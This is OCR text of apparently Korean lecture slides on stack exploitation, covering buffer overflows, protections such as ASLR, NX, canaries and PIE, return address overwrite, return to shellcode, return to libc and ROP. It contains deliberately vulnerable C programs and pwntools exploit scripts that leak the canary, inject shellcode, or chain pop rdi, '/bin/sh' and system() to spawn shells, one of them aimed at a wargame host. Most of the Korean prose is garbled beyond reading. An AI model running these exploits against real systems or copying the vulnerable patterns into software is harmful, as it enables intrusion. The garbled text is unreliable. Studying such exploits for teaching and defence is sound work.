2l 2= EH= 7|

A HHQHEZS #|otHE 0|88 2

SCA 1t Aol F



5. Return Address Overwrite

6. Return to Shellcode

7. Return to Libc
8. Return Oriented Programming



22| A2

#HE 9

(2GB)

8 89
(2GB)

OFF-Limit €4

(64KB)

OFF-Limit G
(64KB)

H1HE"

T 9

(2GB)

HOAHE2

H1HES

MNull Pointer
=g BY(64KB)

H1HE4

\

Ha 89
(2GB)

AR H

2g 2o|=aal ¥

3 g

BSS €49

Cioje S99

3= @Y




H
o

=
o

of

e = PNES

PUSH: AEHOf| 2tS

POP: ESPZ} 7t2[7

12
10
lva)
z ot
firn
10 o
N\

SESS
= x2 U= 7183

[2|7|= EQIE{(Base Pointer)
[2|7|= ZE2IE(Stack Pointer)




0| S E26l7]| ?lof et TEZT(Prolog)2t & HIEZ(Epilog)2t= A= s BICY,



ZHEESH Of|J| 2 E

— L

#include <stdio.h>

int main(void){
int a,b;
a=10;
b =10;

printf("%d",a+b);

return O;




Dump of assembler code for function

push ebp
mov ebp, esp

leave
ret



LOW Address

orLt,

|20 2 Z0}7}
:IIJ\l |.
T-T1I

push ebp

iy
g
L
e
o
o
<
T
<
T




LOW Address

A EH
— =

= X7| /ol
| Z|5tEHE 72| 7

O 1 H
= |
EHO
—I——

o]
=
2 A
= —

)

€SP

(

AEH g
S
Ct.

2t
HA

=< <1 KH
or KF S
{F o7 3
ol i 5
<0 &
KHl i o
1o or J|J

esp, ebp ﬁ

mov epb, esp

w
i
0
e
T
5
=
L
-
I




ot
=

ESPSIETEES

=
A_
X

X|AE|Z DGIARIS B HOE 9
= IR AE Q] 47 HEEHA ARK0] K|
= RFBiCt,

mov dword ptr[ebp - 2T M), 2}

LOW Address

local vriables

HIGH Address
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LOW Address

espOi|l ebp 22 SO A esp 7t ebp 2t 2 XS 7t
2|7|A| S5t11, pop ebp € E5H esp 7t 7t2|7|= O™
St4=0| ABHIR|Q] A E ebp Off XZSHCY,

— ]| —

leave:
mov esp, ebp

pop ebp

HIGH Address

11



pop eipE AEHO|| MEL|0 QYH 2[EHFAE ¢

MESID, jmp eip £ £l 2EIFAZ HI ST},
e

(ol E|HFA= call 2 MBE|= eip2l 440

oo
ret :
pop eip
jmp eip

LOW Address

RET

€ op

HIGH Address

12



AEHO| KO A Aot QUBRL

HIH(Buffer)= &0 A ‘2= FA|'el=s L= AFEEH,
ATE 20X = ‘Clo|E 7t SXX| 2 0|5E|7| o E2tEl= /A XEa’9l 9|i|= ARl

GAL0= O~ 2t=2| 2|0|7t E50| 5| A4 &[0 E1I0|E17f KNEE = U E% CHe S WOl B =
7| STt ARM0| = X Hays AR KT, 2o e HZ2E S92 'e M2t SEIC

HIE QHEZE S

HIH QHEZ2(Buffer Overflow)s= XAt 22 HI{7} HX = A

[0
10
-
rot
A

13



AR 0| 22| 2 Y HEa| WA

O AEZ HE 0|20 HE2E| SAZ[HOICE %s2| F|fE2 Z0| H|eto| giCt= ZO|C}. YHS
A0 YHZ0] Meto] g, =3 % i 20| Hetglo] '2HI0|ES B 7hX| 2F =25t 72t O
&2 0|8olH H2e| & EE= H|He| HAETL 7SS

buf A buf B

/—\/\

14



2, AR HI QHEZ LT

AR H2E H AN 2=

#include <stdio.h> x| Ok i|'7
- : Tl (= |
#1include <string.h>

#include <unistd.h>

read &2 name HIHO| Z{= == RE0|A AW
(void) { OFH 0| &AL,

char secret[16] = "secret message”; Name H'|]I'|9—| 37|E 8H|'O|EO|_|E”, readgl-%\—% %6H 12H|'0|E

char barrier[4] = {}; Dl_l'%- O|=I§||O| ElEE D'”Eﬂl é!Ol HEI'*CL*EEI —J|\— %U:l'

char name[8] = {};

(barrier, o, 4) printf 2H01A %s 2 QIeiA] S F OFF0| ekt Lo
R|eto] gl7|mf 20 HHlo|ES BHmIiX| ZE2 2, of7| M
Lo H|22| 24El gho| ZECt

(8, name, 12);

("Your name is %s.", name);

15



AEH 22 =5 oX]

00 01 Ox2
A A A
Ox41 Ox4l Oxd41l
0x8 039 Oxza
A A A
Ox41 Ox41 Oxd1
Ox10 0x11 Ox12
= t
O0=xe5s O=x7T74 Ox20
Ox18 O0x19 Oxla
g e
O=xe7T Oxes O0x00

=

Your

name HIH2} secret HIH{ ALO|O]| 'EH}O|E
4 =

name 15

D3 Oxzd
A A
Ox41 Oxd41l
Ozl Oxc
A s
Ox41 Ox73
Ox13 Ox14
m e
O=xed Oxe5
ODxlb
O=x00

E = =
= |':|:|

035 Oxé& 134
A A A
Ox4l Ox41 Oxdl
O3xd Oxe= Oxf
e C X
0x65 Oxe3 Ox72
0Ox15 Oxlo Ox17
S S a
0=x73 Ox73 O=x6el

16



2, AEH HIN| QHSEE?

AB | E2| HE KN 2=

#include <stdio.h>
#tinclude <stdlib.h>

#include <string.h>

int auth = @;
char temp[16];
(password)) ;

(temp, password,

if(! (temp, "SECRET PASSWORD"))
auth = 1;

return auth;

(int argc, char *argv[]) {

if (argec 1= 2) {

("Usage: ./sbof_auth ADMIN_ PASSWORDYYN™);

(-1);

{argv[l]))
("Hello Admin!\n");

("Access Denied!\n");

main 2| 21X}7t check auth 42| QX2 HOZIC},
check_auth g0|= &2t AR S THHS Y2 &= auth H
2o} SAtE HIY temp 7t XL}

FSFE2 strncpy &2 0| Eoll A HITH(temp)ol| 2A+S
SAtm Z20[ X7 EXot=0H o7|M Z0] H[eto] E[H{ QX
ok QIXte| 20| BFE0|EE tempiEt= HI= 16HIO0|EO|X|
2 16HI0|E 0| 29| &{= SAI} Jtsotth= 20| A 2 HStC)

17



ABH K| HE ofjF 2=

O x1 Q2 x3 Oaxd x5 Ox & x7
a ad a ad a ad a a
Oxel dxel Oxel dxel Oxel dxel Oxel dxel
Oz 8 Ox5 Oxa Oxlb Oxc Jacd Dxe Oxf
a ad a ad ad ad ad ad
Oxel dxel Oxel Oxel Oxel Oxel Oxel dxel
x x1 Ozl 2 x13
a a a a
x Jxal x ®

EXEE temp 27| &
=

HIO|E S G| Y=ot =|H HIQHES =27t ZdotHA temp HIH F 0|
EXot= auth 2 £ Al

00| Of-l Zto 2 S A =|H ZAXIJ} o| =5t 20| == =ICT

18



FZH I

A E(Shellcode)= 22 37|l ZEE AT EL0f
X

X0k 0|22
OIZ0{o0f §3E i YICekD Balo i /YA
SR A A Hof A HRAZ|7| o

D
L

CHed A|AE0| ZHeto] 2 B2 FIAMO| el IEHAS Sl &2

T CO|Ct,

217 g3c

SI=EIERY

| L= CHef AAE0| CHet

I" 77} = &t

O|C}.

USHS ST 1 AR 4

Jk

19



ASLR

ASLR (Address Space Layout Randomization)O|2?
Kl[ot7| flet 7=
ZAZ ™S 9o

31 O H

ato| =224z

OFX

HEe| &

AEH Gl

Off HHX|SHH, 240 2R3t Target addressE 0| & 51|

— ~1y H OO L O 1

HE A 2E=CL.

y O —

I E J2io| AlsH E of Opct 2t =A

7] RISiM= S5 Et0|EHE|0| M AtEotd = &2 FAS

£ =01 Retu rn—To—lec(RTL)
OEI-Ol-Ol: StCF,

= —
=4 WS

ot ASLRO| 202 ol T2 20| &
O'|E:IT-II|_“:|' (E7|'o

0|E1 ._' O| 20| == E uff O} D AMOl A E JIRICHH O 1A et g

SE g [[H

L olr
I_Lo

o=
ABH 3| Bto|Haiz] Yol Fa

.

20



NX bit / DEP

T2 MA BEOL 2= E= MO M= ¢l 022 SF= M2 =2[5t= CPUS| 7|=0]|L.
NX EELZ X[ZE E= H2e| 192 0| MBS FIShAMEH AFEE|H, T2 M| HF07F 1 X0
SO FELEM 2HEX| == S0 =L

O0|ZZA0E A2 2F MAo Eetel £t 7[S0|H, efe[Hel LT dAk[= A= WX[oh7]| #
off HE2E|S =72 2fQlot= St=H0] 3 2T EL||0] 7|=0]Ct.

DEPE= & JtX| EEZ ASHEICT,

o=%0] DEP: H[Z22|0f]| BAHLZE &l FET ZEE|M = BRE Melotl T2 AM|AS] H= O
o| XM 2D = RS EAIBICL

ChHE =2l =& Z2M[AN= 5t=S0] HE DEPZ X[ &SI,

AT ES0] DEP: CPU7} St=90f DEPE XIQI8HX| 42 B ARSI

21



Stack Canary

A EH 5’H—fE'-IE gl IEZET
01|*1 off g atel HES =Qlot= 2 7[R/ O|[Ct. FtLtg]

mov rax, QWORD PTR fs:0x28

mov QWORD PTR [rbp-0x8], rax
X0r eax, eax

AEH JILIE| TEZ T

Ofl M AEH It Hhats= A AL0]0f ”12|9f £

ZFO
HA —

U [
>

>

N

o8 g

PSRk

mov rcx, QWORD PTR[rbp-0x8]

xor rcx, QWORD PTR fs:0x28
je Ox6fo <=& F=a>

ol st&o| g &E 21

M= S=ElCL

call 0x570 <__stack _chk_failagplt>

AEH FHLte| O 2=

22



PIE

PIE 22 7|E0|2 M| 2|2 HEITI0f| #{X|et 7| A0 2= ZMZ A RO =42t 2| §{0] HES| &
=ICt = M2 | e BP0 =2l /X7t o HH2CH= 2[0| 0|t

PIE 227|80| Mgl =2 SE&ot 3= 0| §l0] 0= HE2| FL0AME 20| 7HsolH O
He| =49 Mefs »X| =Lt

0| H3 7|2 FZ RTL(Return To Libc), ROP(Return Oriented Programming) =} 22 Ho|L 2|
OlM &l 7tset ZEQ QUME BRE ol= 54 7|8E AME5tH 1 il 0] =71 OfC|0f| EXH5=
A

—

= & o U ek

23



Return Address Overwrite2h?

stack frame2| 20| £XSt= return address ZE = overwrite 2N, &7t EY Of Hot= T4,
Hot= etro IEZ 27|18 HASIHEE Sh= 7|HO|LCY,

- O T —

U HI RET

24



5. Return Address Ove

Return Address Overwrite O|X| ZE

Hinclude <stdio_h>

#include <unistd.h> $|O_II:ID.I ﬂ.jl
¢ {
FoHH2 scanf 2h4=01| %s Of| A ZBITE buf 2 37|= 0x28
O|X|2F ZO| M|eto| LB =, A HI QHEZR7 Ll
2 itk

char *cmd = "/bin/sh";

char *args[] = {cmd,

HI > SFP -> RET £A{0|22, HHZ E0f SFP7X| o
RET £ ZAHsH 2lots 202 HtE 4 ULt

{cmd, args,

char buf[©x28];

Os get_shell Ol2f= et7F EXSIEEZ RET 2| 4= O ah9| =
R LS WA A HS B 4 9Lt

"™ . buf):

25



5. Return Address Overwrite

ClojdSE 2 &

HIHO|| ¢/X|= ebp - 0x28 0|2 2
scanf(%s, (ebp-0x28)0|2t11 &

pwndbg> p get_shell

§1 = {<text variable, no debug info=}

FA
BT

ot

main

4 Ak,

get_shell &2 A5 HOILARILY.

26



5. Return Address Overwrite

from pwn import °
p = remote( ' ho .dreamhack.

payload = A
payload += 'B' * 0x8

payload += "\ xaa\x06\x40\x00}

p. recvuntil(’ ' Input:

p.sendline(payload)

p.interactive()

x00%

games',

x00%

004\ x00

H I 9|

37
O|R= 215

= 0x280|X|2t HHM[Z2= AL =X ets
)

|
i 0x30 O|2t= 27|= 7HX|A| €Lt

64bit elf 0|22 HIH{(0x30) + SFP(0x8) + RET(get_shell
2ol =4) E I0|2EF +4o1H E LT

27



Return to Shellcodeit?

HIHO 2IBES A AR 2B ES MEAF|2 HdIES K|2leh LIHA| HINZ V|2 SFPEIE S
HO|ZfCE H2 F Return address 2f2 shellcodeZt & El FAZE HAG, shellcodeE SESHE
HEALO|C}
O .

d3c + o LJHX| | SFP(64bit or 32bit)

28



6. Return to Shellcode

Return to Shellcode O|X| 2 E
e HRe HS7|H N2

<unistd >

STACK CANARY NX RPATH RUNPATH FILE
int main() { -

char buf[@x5@];

("Address of the buf: ¥p\n", buf);

("Distance between buf and $rbp: %1d\n", =x 1 ~

(char¥*) (8) - buf);

("[1] Leak the canary\n"); bUf_O—l ﬂle OX500|E|-0 X1%0-” AEI-(.SOHElﬁ bUf _O—l $—+—§ %E_:II-(I)-H_?'_S

Ch 0213 FPte] 22 B 4 Qs K 2120l read 471

’ EXHotCt, FHLt2]| =2 St printf @42 %s 2| F XS 0| Ed|

M 712 22 5298 4 9Lt

("Your input is "%s'\n", buf);
("[2] Overwrite the return address"); ] El T, I:Il-Xl EII- getsgl -Clél'#_gl $| O_II:IE-II% Ol_g‘é‘HA—l -J%IEE - Lél-g I:I-I

("Input: "); =

(stdZut}; ]I-I + SFP + RET(bUfgl _$__+_)§ ]I-” |§:§ T'é;lol-ﬁ E'|_IE|-

(buf);

return O;

}

29



6. Return to Shellcode
|:|0-|kll |

mov rax, qword ptr

rax, [rbp - 0x60]
edx, 0x100

rsi, rax

ed ]_ 0

aplt

mov gword ptr [rbp
A0r edx, edX
L2 TEE2T reade

$|9FE0| ZXH3H= read B4
rax, [rbp - 0x60]
rsi, rax
rdi, [rip + 0x146]
eax, 0

printf@plt

rax, [rbp - 0x60]
rsi, rax

rdi, [rip + 0xl6c]
eax, 0

printfeplt

bufe| =& =4 n ——.
rax, rbp i FtLte| 20| 2 d5t= printf &<
rdx, rax
rax, [rbp - 0x60]

rdx, rax

rax, [rbp - 0x60]
rdi, rax

eax, 0

rax, rdx

rsi, rax

rdi, [rip + 0x160]
eax, 0

printfeplt
bufel rbp2l QA &

30



6. Return to Shellcode

p.recvuntil( ™%

buf2sfp = (p.recvline().split()[©])
buf2cnry = buf2sfp - B8

slog("buf <=> sfp", bufZsfp)

from pwn import *

def slog(n, m): return success(": ".join{([n, (m}]))

p = process("./r2s")

slog("buf <=> canary", bufZcnry)

context.arch = "amdt4"

HIHQI AEO| QI MIS 7|4 5
I e} Ftife| QT A Lk

payload = b"A"*(bufZcnry + 1)

p.recvuntil("buf: ™)

p.sendatter("Input:"”, payload)

buf = {P _ I"E'CH]._'-I.I'IE"[: } [ - _]_] , J_r_-_-:l p.recvuntil(payload)
. . cnry = ubd(b"\x00"+p.recvn(7))
slog{"Address of buf", buf) slog("Canary”, cnry)
HI{O| RAZ 02 Jtatal = 2 et FfLta) B

31



6. Return to Shellcoc

sh = asm(shellcraft.sh())
payload = sh.ljust(bufZcnry, b"A") + p6d(cnry) + b"B"*¥0x8 + p64(buf)

p.sendlineaftter("Input:", payload)

_J,\é :’EH [ I—E Olﬂ H *-"o |:|I_|'=O-|—|—_|_ ]I'”OlEI_E | €|5H IE_||7:IZ|_'SE|-
=AE + |:-||:I| + ZI2fL]|+ 0] + HIHS 4

p.interactive()

A} HZ

32



Return to LibcEh?

“return-to-libc” 42 £, = 282 NEFEI 82 45 0[0] ZZM[AS

Kot MEREIQ 4= WM EA of=, HIE QLEHEE A0 AMEE[= HREH

Return Address A= a7 2fo|lHe{g| g2 FAZE XA, ol|iet e+E 2 =0
oiE 7|H= 0|%+f NX bit ( DEP ) H 22| Eo7[HE 22[e + UL},
mew | HIAC
er
, N | SH
/bin/sh A8 system0) e S X
Execvel() SFP
' Hefurn
Execi() — | address
Ele... Agrument

2 Jts HZ22[0 2
Hor ZHO0|Lt,

33



7. Return to Libc

Return to lec ol 2

#include =stdio

#include

const char® binsh = °
int main() {

char buf[0x30];

setvbuf(stdin, 0,
setvbuf(stdout, 0,

_IONBF, 0);
_IONBF, 0);

// Add system function to plt s entry
system("echo 'system@plt");
// Leak canary

printf("[1] Leak
printf("Buf: ");
read(0, buf, 0x100);
printf("Buf: %s\n",

Canary\n")

buf) ;

// Overwrite return address
printf("[2] Overwrit
printf("Buf: ");

read(0, buf, 0x100);

e return address\n");

return 0;

}

HE22 BEs7(H =3

STACK CANARY RPATH RUNPATH FILE
rtl
2AM Ol FeFd X7
MolE 2Idl G| ZE=0M system@pltO] ZXHStCE, FtLt2|E 2 & £
A= HHW F ALl read =7t EXHSHCL,
2|0 ABH HIQHEELR FUHO| &XlSt= FHMW read &7t
ZMSIBEE, 47| g2 Soll 34 & ULt

NX Es7|Ho| M £[Q/O B 2 Return to ShellcodeZ2 = 9tk 11 Ret
urn to Libc 7|HO = T =LY 0| EXHSt= system &+E 0|2 TtLY,

$ ROPgadget --binary ./rtl --re "pop rdi"

Gadgets information

Bx0000000000400853

: pop rdi ; ret

34



pwndbg> search fbin/sh

rtl OxA00874 0x6873216e69622f /* '/fbin/sh' */f

rtl Ox600874 0x68732f6e69622f /* '"/bin/sh" */
libc-2.27.s0 Bx7fTf36claabfa Bx687321T6e696221 /* '/binfsh"' #*/f

rsp,
rax, qword ptr fs:[0x28

1J|r1 ptr [rbp - 8], rax binsh ; _7|c__+_§ j¢|.|_|:|_

eax, eax
|- 2| ZI=S27 pwndbg> plt
0x4005b0: puts@plt
0x4005c0:  stack chk fail@plt
_ 1t Ox4005d0: systemf@plt
system g+ Z system@plt Ox4805e0: printf@plt
Ss= Ox4005f0: read@plt
x400680: setvbuffplt

edi, 0x40087c

eax,

addr of ("pop rdi; ret") <= return address
addr of string "/bin/sh" <= ret + Bx8 p[t O| RXAZ 7CI-E|_‘_|-.

T L-= X

addr of "system" plt <= ret + Bx106

O[FH| 713 = <ol OFetLt.
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7. Return to Libc

1L
CIAZ=ZOl A E

from pwn import ¥

process(™. /rt1") system plt = e.plt["system”]

ELF("./rtl") binsh = 0x408874

of slog(name, addr): return success{": ".join([name, (addr)]))

o -+ AN
=== 0|8d 22 B=5

Okl
1N
1o
40
rot
M
Y
N

= 7= ME

payload = b"A"*0x38 + pbd{cnry) + b"B"*0x3

buf b A0 30 payload += pb64(ret)
LI = 1 o9
payload += p&4(pop rdi)

p.sendaftter("Buf: ", buf) payload += p64(binsh)
p.recvuntil(buf) payload += p64(system_plt)
cnry = ubd(b"\x08"+p.recvn(7))
pause( )
SIGE{HEEHEF}""J ':nr'}"r} p.sendafter("Buf: ", payload)
HINE C{0|2fS M2 F ZILtE HIH C{0] + FHLt2| + SFP C{0| + ropE
=& ot JiLie| af= Eor=L. system &4& binsh 22 A& A|ZICT,
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Return Oriented Programming &t?

ROPZ|®#0]2t Return-Oreinted-Programming?| kX2 et X|&ked T2 a2} O|C},
ret3F0|| 71 S 0|85t HEMO = ot-5 2 =0IH S HA7) #ot= SFHZE T2 2 5t%
SHeICH= 59| 7| OILt.

- A

ASLR, DEP/NXEP—I HEZ E37|8ME 2261 383 5= U= 7|HO0|H,
ST 71He AFRSTISIs A ZIEXI AFRX|A|0] HR3iCt,
M RTL, RTL—Chaining, PLT,GOT, GOT_Overwrite, GadgetS0| Z 6|LCt,

37



ROP 212

Buf[64]
Buf[64]
ebp
SFP
RET
Argv|[0]
Argv[1]

ebp-0x86

5t I SESHIE

OFro
LS —
() O AL ()
= Yy E = US|

Buffer OverwriteZ} E{ X Al buf2| 64HI0|EHL} 4

LE|= RETEYNIX| E20| 7Fs3SICE 47| M RTL _Chain
ing?f 20| 7}HE ALE0IN, gf+& 2 =6t1, QIXIE He
g+~ QUL

-1 " 1—

A
HHE X O 2 AdH
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ROP &2

Buf[64]

Buf[64]

SFP

Puts()

Pop ret;

Puts_got

Puts(2| got &

ebp

ebp-0x86

Read()

Pop pop pop ret;

/- Read()

Pop pop pop ret;

0 0
bss Puts_got
8 8
"/binfsh"2XE 2 Read()& &0l
bssEH| HE Puts_gotOi|

System()FLE HE
Got_overwrite

1. puts() &+Z 0|51 puts()?:.M O gotFAE EHA
ZICt, &3 A[Z] PayloadOl|A EH H0f SHOLELL,

2. read()&+E Sl .bssEFHO0| system()et+2| QUXI=E
st /bin/shEXtE 2 X &otA =Lt

3. read()&+E Sl puts()&=2| gotd]l AA| L2 syste
m() &2 HHMF2E XHESIH got_overwrites ._Hif

buf SFP | Putsplt | AAAA %.gl-gf}_i
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